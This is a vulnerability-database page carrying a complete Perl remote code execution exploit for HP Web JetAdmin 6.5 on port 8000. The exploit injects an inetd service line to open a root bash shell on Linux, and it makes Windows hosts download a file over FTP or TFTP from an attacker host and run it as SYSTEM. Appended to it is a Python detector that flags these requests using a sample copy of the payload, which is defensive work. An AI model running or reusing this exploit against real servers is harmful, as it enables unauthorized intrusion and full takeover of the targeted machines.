HP Web JetAdmin 6.5 – ‘connectedNodes.ovpl’ Remote Code Execution


Vulnerability ID: 1054465
Vulnerability type: (not given)
Published: 2004-04-28
Updated: 2004-04-28
CVE: N/A
CNNVD-ID: N/A
Platform: Hardware
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/294
|Details
Vulnerability details have not been disclosed.
|Exploit
#!/usr/bin/perl
use IO::Socket;
#
# This is an exploit for HP Web JetAdmin, the printer management server from HP.
# It is NOT about printers! The service usually runs on port 8000 on Windows,
# Solaris or Linux boxes.
#
# Greetz: The Phenoelit People, c-base crew, EEyE (rock!), Halvar on the other
#         side of the planet, Johnny, Andreas, Lisa, H D Moore, Nicolas
#         Fishbach and all the others I forgot
#


$|=1;

die "Specify server name or IP\n" unless ($host=shift);

#
# lala stuff
#
print "Phenoelit HP Web JetAdmin 6.5 remote\n".
" Linux root and Windows NT/2000 Administrator exploit\n".
" by FX of Phenoelit\n".
" Research done at BlackHat Singapore 2002\n\n";

#
# Check version for the kiddies
#
$request="GET /plugins/hpjwja/help/about.hts HTTP/1.0\r\n\r\n";
&doit();
#
# Get the path first (the about page embeds the path to framework.ini in an HTML comment)
#
$rs=~/-- framework.ini (.+)-->/;
$hppath=$1;
if ($hppath) { $hppath=~s/\/doc\/plugins\/framework\/framework.ini//; }
#
# Now get some more info
#
$rs=~s/[\r\n\t]//g;
$rs=~s/<\/td><td valign="top" nowrap>//g;
$rs=~/JetAdmin Version<\/b>([^<]+)<\/td>/;
$version=$1;
$rs=~/System Version<\/b>([^<]+)<\/td>/;
$system=$1;
die "It's not version 6.5 or version extraction failed\n" unless ($version=~/6.5/);
die "Could not extract path\n" unless ($hppath);
#
# Info 2 user
#
print "HP Web JetAdmin Path: \n\t".$hppath."\n";
print "HP Web JetAdmin Version: ".$version."\n";

if ($system=~/Linux/) {
printf "Host system identified as Linux ...\n";
#
# Create file content and kick off inetd
#
$cont=
"obj=Httpd:VarCacheSet(hacked,true);".
    "Httpd:ExecuteFile(/usr/sbin/,inetd,".$hppath."/cache.ini)".
"&__BrowserID=0%0a3000%20stream%20tcp%20nowait%20root%20/bin/bash%20bash%0a";

$request = "POST /plugins/framework/script/content.hts HTTP/1.0\r\n".
"Host: ".$host."\r\n".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
"Accept-Language: en\r\n".
"Pragma: no-cache\r\n".
"Cache-Control: no-cache\r\n".
"User-Agent: Phenoelit script\r\n".
"Referer: http://www.phenoelit.de/\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;

&doit();
print "You should now connect to $host:3000 and enjoy your root shell\n";

} elsif ($system=~/WinNT/) {

print "Target system is Windows.\n".
" Do you want file upload via FTP [f] or TFTP [t]: ";
$usersel=<STDIN>;
if ($usersel=~/^f/i) {
print "FTP used ...\n";
print "FTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "FTP User: "; $ftpu=<STDIN>; chomp($ftpu);
print "FTP Pass: "; $ftpp=<STDIN>; chomp($ftpp);
print "FTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "FTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);

print "File ".$ftpfile." will be downloaded from ".$ftph.$ftppath."\n".
" with username ".$ftpu." and password ".$ftpp."\n";

$cont=
"obj=".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,open ".$ftph.",>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpu.">>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpp.">>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,lcd c:\\,>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,cd ".$ftppath.",>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,bin,>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,get ".$ftpfile.",>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,quit,>>c:\\x.txt);".
"Httpd:ExecuteFile(,ftp.exe,-s:c:\\x.txt);".
"Httpd:ExecuteFile(c:\\,".$ftpfile.")";

} elsif ($usersel=~/^t/) {
print "TFTP used ...\n";
print "TFTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "TFTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "TFTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);

$ftppath.="/" unless ($ftppath=~/\/$/);
$cont=
"obj=".
"Httpd:ExecuteFile(,tftp.exe,-i,".$ftph.",GET,".
$ftppath.$ftpfile.",c:\\".$ftpfile.");".
"Httpd:ExecuteFile(c:\\,".$ftpfile.")";

} else {
print "Wurstfinger ?\n";
exit 0;
}

$request = "POST /plugins/framework/script/content.hts HTTP/1.0\r\n".
"Host: ".$host."\r\n".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
"Accept-Language: en\r\n".
"Pragma: no-cache\r\n".
"Cache-Control: no-cache\r\n".
"User-Agent: Phenoelit script\r\n".
"Referer: http://www.phenoelit.de/\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;

print "If everything works well, the specified file should be running\n".
" soon in SYSTEM context. Don't stop this script until your program\n".
" terminates. Enjoy the box.\n";
&doit();

} else {
print "Host OS (".$system.") not supported by exploit - modify it\n";
}

exit 0;


# Send $request to port 8000 on $host and collect the full response in $rs
sub doit {
    $remote =
      IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>"8000",);
    die "cannot connect to http daemon on $host\n" unless($remote);
    $remote->autoflush(1);
    print $remote $request;

    $rs="";
    while ( $rline=<$remote> ) {
$rs.=$rline;
#print $rline;
    }

    close $remote;
}

# milw0rm.com [2004-04-28]
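As an added defensive example (not part of the Exploit-DB listing or of this site), the following Python classifies captured HTTP requests by the indicators visible in the exploit above: a POST to /plugins/framework/script/content.hts whose obj parameter carries Httpd:ExecuteFile or Httpd:VarCacheSet calls, and a __BrowserID value that contains an injected line break or an inetd.conf-style service line (the trick the Linux branch uses to turn a cached form value into a new inetd service). The sample requests, the hostname printserver.example, the install path /opt/hpwebjetadmin and the benign obj value are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the exploit listed above: the script endpoint it POSTs
# to and the server-side calls it smuggles in through the "obj" parameter.
SCRIPT_ENDPOINT = "/plugins/framework/script/content.hts"
DANGEROUS_CALLS = ("Httpd:ExecuteFile", "Httpd:VarCacheSet")
# Shape of the line the Linux branch injects into inetd.conf:
# "<port> stream tcp nowait <user> <program> <args>"
INETD_LINE = re.compile(r"\d+\s+stream\s+tcp\s+nowait\s+\S+", re.IGNORECASE)


def parse_http_request(raw):
    """Split a raw HTTP request (bytes) into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers,
            "body": body.decode("latin-1")}


def form_fields(body):
    """Decode an application/x-www-form-urlencoded body into a dict (last value wins)."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def classify_request(raw):
    """Return the reasons a captured request matches the exploit pattern (empty list = clean)."""
    req = parse_http_request(raw)
    reasons = []
    if req["method"] != "POST" or req["path"].split("?", 1)[0] != SCRIPT_ENDPOINT:
        return reasons
    fields = form_fields(req["body"])
    obj = fields.get("obj", "")
    for call in DANGEROUS_CALLS:
        if call in obj:
            reasons.append(f"{call} call in obj parameter")
    browser_id = fields.get("__BrowserID", "")
    if "\n" in browser_id or "\r" in browser_id:
        reasons.append("line break injected into __BrowserID")
    if INETD_LINE.search(browser_id):
        reasons.append("inetd.conf service line in __BrowserID")
    return reasons


# Constructed sample traffic (not captured from a real host). The first request
# mirrors the shape of the Linux branch above with a made-up install path; the
# other two are benign (the obj value "nothing_suspicious" is a placeholder).
EXPLOIT_LIKE = (
    b"POST /plugins/framework/script/content.hts HTTP/1.0\r\n"
    b"Host: printserver.example\r\n"
    b"Content-type: application/x-www-form-urlencoded\r\n\r\n"
    b"obj=Httpd:VarCacheSet(hacked,true);"
    b"Httpd:ExecuteFile(/usr/sbin/,inetd,/opt/hpwebjetadmin/cache.ini)"
    b"&__BrowserID=0%0a3000%20stream%20tcp%20nowait%20root%20/bin/bash%20bash%0a"
)
BENIGN_POST = (
    b"POST /plugins/framework/script/content.hts HTTP/1.0\r\n"
    b"Host: printserver.example\r\n\r\n"
    b"obj=nothing_suspicious&__BrowserID=42"
)
BENIGN_GET = b"GET /plugins/hpjwja/help/about.hts HTTP/1.0\r\n\r\n"


def scan(requests):
    """Map each request index to its list of reasons; only flagged requests are included."""
    return {i: r for i, r in enumerate(classify_request(q) for q in requests) if r}


if __name__ == "__main__":
    for idx, reasons in scan([EXPLOIT_LIKE, BENIGN_POST, BENIGN_GET]).items():
        print(f"request {idx}: " + "; ".join(reasons))
```

Because the indicators live in the POST body, this needs a capture that includes request bodies (a reverse proxy or IDS in front of port 8000), not a plain access log; matching on the obj parameter rather than on the User-Agent or Referer strings means a trivially modified copy of the script is still caught.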
